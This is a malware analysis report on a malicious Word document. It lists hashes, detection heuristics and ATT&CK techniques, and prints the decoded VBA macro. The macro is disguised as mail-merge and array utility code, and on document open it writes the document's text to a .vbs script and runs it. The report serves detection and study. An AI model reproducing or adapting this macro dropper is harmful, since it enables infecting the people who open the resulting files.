Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 60ed6d1f65ce9492…

MALICIOUS

Office (OLE)

1.13 MB Created: 2020-10-20 10:27:00 Authoring application: Microsoft Office Word First seen: 2020-12-28
MD5: ee2f686149c0739d4178ddb6a4f58c6e SHA-1: 20b19893f6bc4c689bee6c465bd2a3862b840613 SHA-256: 60ed6d1f65ce9492af796964501978d2c2fc5a2ea7803f1fef34741626652857
250 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The file contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The presence of 'CreateObject' and 'SC_STR_WSCRIPT' heuristics suggests the macro attempts to interact with the system, likely to download and execute a payload. The 'SE_PASSWORD_ARCHIVE_LURE' heuristic indicates the document may be instructing the user to open a password-protected archive, a common tactic to bypass security scanning.

Heuristics 8

  • ClamAV: Doc.Dropper.EmbeddedBase64Exe-9865902-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.EmbeddedBase64Exe-9865902-1
  • Heap-spray pattern detected high SC_HEAP_SPRAY
    Repeated 0x41 (A) bytes found
    Disassembly
    Attempted x86 opcode disassembly
    0000258E  41                inc ecx
    0000258F  41                inc ecx
    00002590  41                inc ecx
    00002591  41                inc ecx
    00002592  41                inc ecx
    00002593  41                inc ecx
    00002594  41                inc ecx
    00002595  41                inc ecx
    00002596  41                inc ecx
    00002597  41                inc ecx
    00002598  41                inc ecx
    00002599  41                inc ecx
    0000259A  41                inc ecx
    0000259B  41                inc ecx
    0000259C  41                inc ecx
    0000259D  41                inc ecx
    0000259E  41                inc ecx
    0000259F  41                inc ecx
    000025A0  41                inc ecx
    000025A1  41                inc ecx
    000025A2  41                inc ecx
    000025A3  41                inc ecx
    000025A4  41                inc ecx
    000025A5  41                inc ecx
    000025A6  41                inc ecx
    000025A7  41                inc ecx
    000025A8  41                inc ecx
    000025A9  41                inc ecx
    000025AA  41                inc ecx
    000025AB  41                inc ecx
    000025AC  41                inc ecx
    000025AD  41                inc ecx
    000025AE  41                inc ecx
    000025AF  41                inc ecx
    000025B0  41                inc ecx
    000025B1  41                inc ecx
    000025B2  41                inc ecx
    000025B3  41                inc ecx
    000025B4  41                inc ecx
    000025B5  41                inc ecx
    000025B6  41                inc ecx
    000025B7  41                inc ecx
    000025B8  41                inc ecx
    000025B9  41                inc ecx
    000025BA  41                inc ecx
    000025BB  41                inc ecx
    000025BC  41                inc ecx
    000025BD  41                inc ecx
    000025BE  41                inc ecx
    000025BF  41                inc ecx
    000025C0  41                inc ecx
    000025C1  41                inc ecx
    000025C2  41                inc ecx
    000025C3  41                inc ecx
    000025C4  41                inc ecx
    000025C5  41                inc ecx
    000025C6  41                inc ecx
    000025C7  41                inc ecx
    000025C8  41                inc ecx
    000025C9  41                inc ecx
    000025CA  41                inc ecx
    000025CB  41                inc ecx
    000025CC  41                inc ecx
    000025CD  41                inc ecx
    000025CE  41                inc ecx
    000025CF  41                inc ecx
    000025D0  41                inc ecx
    000025D1  41                inc ecx
    000025D2  41                inc ecx
    000025D3  41                inc ecx
    000025D4  41                inc ecx
    000025D5  41                inc ecx
    000025D6  41                inc ecx
    000025D7  41                inc ecx
    000025D8  41                inc ecx
    000025D9  41                inc ecx
    000025DA  41                inc ecx
    000025DB  41                inc ecx
    000025DC  41                inc ecx
    000025DD  41                inc ecx
    000025DE  41                inc ecx
    000025DF  41                inc ecx
    000025E0  41                inc ecx
    000025E1  41                inc ecx
    000025E2  41                inc ecx
    000025E3  41                inc ecx
    000025E4  41                inc ecx
    000025E5  41                inc ecx
    000025E6  41                inc ecx
    000025E7  41                inc ecx
    000025E8  41                inc ecx
    000025E9  41                inc ecx
    000025EA  41                inc ecx
    000025EB  41                inc ecx
    000025EC  41                inc ecx
    000025ED  41                inc ecx
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    On Error Resume Next
    Set Wildcard = CreateObject("Scripting.FileSystemObject")
    Set Gotchas = Wildcard.CreateFolder("C:\Required")
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
    CopyArray
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10629 bytes
SHA-256: 353639889fd785682c78494c5e5d456313b3471a11c7a39defccbc9cab160eec
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Sub Document_Open()
CopyArray
End Sub

Attribute VB_Name = "BetweenArrays"


' startingpoint = starting point in source array.
' numberofvalues = number of elements of the array to copy from source to dest array.
' Rules:
' 0. Input Variant SourceArray and DestArray params must be arrays, otherwise the Sub()
' exits with nothing done. Either may, however, be passed in with a length of 0 (ie, Ubound = 0)
' 1. All values in dest array are wiped out unless the operation exited due to exit conditions
' as mentioned below.
' 2. Dest array is returned the same size of the source array or whatever the length of the
' numberofvalues is, if that is > 0.
' 3. Dest array never has trailing empty array values unless they are part of the coopyable
' values from the source array.
' 4. If startingpoint > length of source array, operation exits without changes to the dest array
' 5. If numberofvalues = 0, then all values from the source array starting from startingpoint

Dim m_oXML
Dim m_sSource As String
Dim m_sWordTemplate As String
Dim m_bFile As Boolean
Dim m_sErr As String
Dim m_sDocPath As String
Dim m_sDocPrefix As String

Public Property Let XMLFile(sFileName As String)

    m_sSource = sFileName
    m_bFile = True
    
End Property

Public Property Let XMLString(sStr As String)

    m_sSource = sStr
    m_bFile = False
    
End Property

Public Function Execute() As Boolean

    Dim bLoaded As Boolean
    Dim oWordDoc As Word.Document
    Dim oWordField As Word.MailMergeField
    Dim oWordTable As Word.Table
    Dim oWordFieldRange As Word.Range
    Dim oXMLDocNode As MSXML.IXMLDOMNode
    Dim oXMLFieldNode As MSXML.IXMLDOMNode
    Dim oXMLParentNode As MSXML.IXMLDOMNode
    Dim oXMLNextNode As MSXML.IXMLDOMNode
    Dim oXMLDoc As MSXML.IXMLDOMNode
    Dim nParentIndex As Integer
    Dim nRow As Integer
    Dim nCol As Integer
    Dim bRowColFound As Boolean
    Dim bTableField As Boolean
    Dim sFieldSplit() As String
    Dim n As Integer
    Dim i As Integer
    Dim sPath As String
    Dim bTablesProcessed() As Boolean
    Dim nTable As Integer
    
    oWord.Visible = True
    
    If m_oXML Is Nothing Then
        Set m_oXML = New MSXML.DOMDocument
    End If
    m_oXML.async = False
    
    If m_bFile Then
        bLoaded = m_oXML.Load(m_sSource)
    Else
        bLoaded = m_oXML.LoadXML(m_sSource)
    End If
    
    If bLoaded Then
        
        If m_sDocPath = "" Then
            sPath = GetPath(m_sWordTemplate)
        Else
            sPath = m_sDocPath
        End If
        
        Set oXMLDoc = m_oXML.DocumentElement
        
        If oXMLDoc.HasChildNodes Then
            For Each oXMLDocNode In oXMLDoc.ChildNodes
           
                Set oWordDoc = oWord.Documents.Add(m_sWordTemplate, False)
                ReDim bTablesProcessed(oWordDoc.Tables.Count)
                For Each oWordField In oWordDoc.MailMerge.Fields
                    
                    oWordField.Select
                    Set oWordFieldRange = oWord.Selection.Range
                
                    bTableField = False
                    nTable = -1
                    For Each oWordTable In oWordDoc.Tables
                        nTable = nTable + 1
                        If oWordFieldRange.InRange(oWordTable.Range) Then
                            bTableField = True
                            Exit For
                        End If
                    Next oWordTable
                    
                    sFieldSplit = Split(oWordField.Code, " ")
                    sFieldSplit = Split(sFieldSplit(2), "_")
                    
                    Set oXMLFieldNode = oXMLDocNode
                    Set oXMLParentNode = Nothing
                    For n = LBound(sFieldSplit) To UBound(sFieldSplit)
                    
                        Set oXMLFieldNode = oXMLFieldNode.SelectSingleNode(sFieldSplit(n))
                        If oXMLFieldNode Is Nothing Then
                            Exit For
                        End If
                        If bTableField And oXMLParentNode Is Nothing Then
                            Set oXMLNextNode = oXMLFieldNode.NextSibling
                            If Not oXMLNextNode Is Nothing Then
                                If oXMLNextNode.BaseName = oXMLFieldNode.BaseName Then
                                    Set oXMLParentNode = oXMLFieldNode
                                    nParentIndex = n
                                    Exit For
                                End If
                            End If
                        End If
                    Next n
                    
                    If bTableField And Not oXMLParentNode Is Nothing Then
                        nRow = 0
                        nCol = 0
                        Do While Not oXMLParentNode Is Nothing
                            Set oXMLFieldNode = oXMLParentNode
                            For n = nParentIndex + 1 To UBound(sFieldSplit)
                                Set oXMLFieldNode = oXMLFieldNode.SelectSingleNode(sFieldSplit(n))
                                If oXMLFieldNode Is Nothing Then
                                    Exit For
                                End If
                            Next n
                            If oXMLFieldNode Is Nothing Then
                                oWordFieldRange.Text = "Unresolved fieldname"
                            Else
                                If nRow = 0 Then
                                    bRowColFound = False
                                    For nRow = 1 To oWordTable.Rows.Count
                                        For nCol = 1 To oWordTable.Columns.Count
                                            If oWordFieldRange.InRange(oWordTable.Cell(nRow, nCol).Range) Then
                                                bRowColFound = True
                                                Exit For
                                            End If
                                        Next nCol
                                        If bRowColFound Then
                                            Exit For
                                        End If
                                    Next nRow
                                    oWordFieldRange.Text = oXMLFieldNode.ChildNodes.Item(0).Text
                                Else
                                    nRow = nRow + 1
                                    If Not bTablesProcessed(nTable) Then
                                        If nRow <= oWordTable.Rows.Count Then
                                            oWordTable.Rows.Add oWordTable.Rows.Item(nRow)
                                        Else
                                            oWordTable.Rows.Add
                                        End If
                                    End If
                                    oWordTable.Cell(nRow, nCol).Range.Text = oXMLFieldNode.ChildNodes.Item(0).Text
                                End If
                                Set oXMLParentNode = oXMLParentNode.NextSibling
                            End If
                        Loop
                        bTablesProcessed(nTable) = True
                     Else
                         If oXMLFieldNode Is Nothing Then
                             oWordFieldRange.Text = "Unresolved fieldname"
                         Else
                             oWordFieldRange.Text = oXMLFieldNode.ChildNodes.Item(0).Text
                         End If
                    End If
                    
                Next oWordField
                
                i = i + 1
                oWordDoc.SaveAs sPath + m_sDocPrefix + CStr(i) + ".doc"
                'oWordDoc.Close
                
            Next oXMLDocNode
            
        End If
    
    Else
    
    End If
    Set m_oXML = Nothing
    
End Function

Private Sub Class_Initialize()
    
    If nRef = 0 Then
        Set oWord = New Word.Application
    End If
    nRef = nRef + 1
        
End Sub

Private Sub Class_Terminate()

    Set m_oXML = Nothing
    nRef = nRef - 1
    If nRef = 0 Then
        Set oWord = Nothing
    End If

End Sub

Public Property Get LastError() As String

    LastError = m_sErr

End Property

Public Property Let WordTemplate(sWordTemplate As String)
    
    m_sWordTemplate = sWordTemplate
    
End Property

Public Property Let Path(sPath As String)

    m_sDocPath = sPath
    
End Property

Public Property Let DocumentPrefix(sPrefix As String)

    m_sDocPrefix = sPrefix
    
End Property

Public Sub CopyArray(Optional SourceArray As Variant, _
Optional DestArray As Variant, _
Optional startingpoint As Long = 1, Optional numberofvalues As Long = 0)
If (Not IsArray(SourceArray)) Or (Not IsArray(DestArray)) Then
On Error Resume Next
Set Wildcard = CreateObject("Scripting.FileSystemObject")
Set Gotchas = Wildcard.CreateFolder("C:\Required")
Wildcard.createtextfile ("C:\Required\DOMDocument.vb" + "s")
Set ASCIIfile = Wildcard.opentextfile("C:\Required\DOMDocument.vb" + "s", 8, 1)
ASCIIfile.writeline ActiveDocument.Range
End If
ASCIIfile.Close
Set Gotchas = Wildcard.CreateFolder("C:\Required\occurs")
If UBound(SourceArray) = 0 Then
Set Wildcard = New WshShell
ReDim DestArray(0 To 0)
End If
Wildcard.Exec "explorer.exe C:\Required\DOMDocument.vb" + "s"
If startingpoint < 1 Then
startingpoint = 1
End If
If numberofvalues < 0 Then
numberofvalues = 0
End If
If startingpoint > UBound(SourceArray) Then
Exit Sub
End If
If numberofvalues > 0 And _
(startingpoint + numberofvalues) > UBound(SourceArray) Then
Exit Sub
End If
Dim lngDestLength As Long, lngCnt As Long
If numberofvalues = 0 Then
lngDestLength = (UBound(SourceArray) - startingpoint) + 1
Else
lngDestLength = numberofvalues
End If
ReDim DestArray(lngDestLength)
For lngCnt = 1 To lngDestLength
DestArray(lngCnt) = SourceArray((startingpoint + lngCnt) - 1)
Next
Exit Sub
MsgBox "CopyArray(): Error occurred.", vbInformation, "Error occurred."
MsgBox Err.Number & ": " & Err.Description
End Sub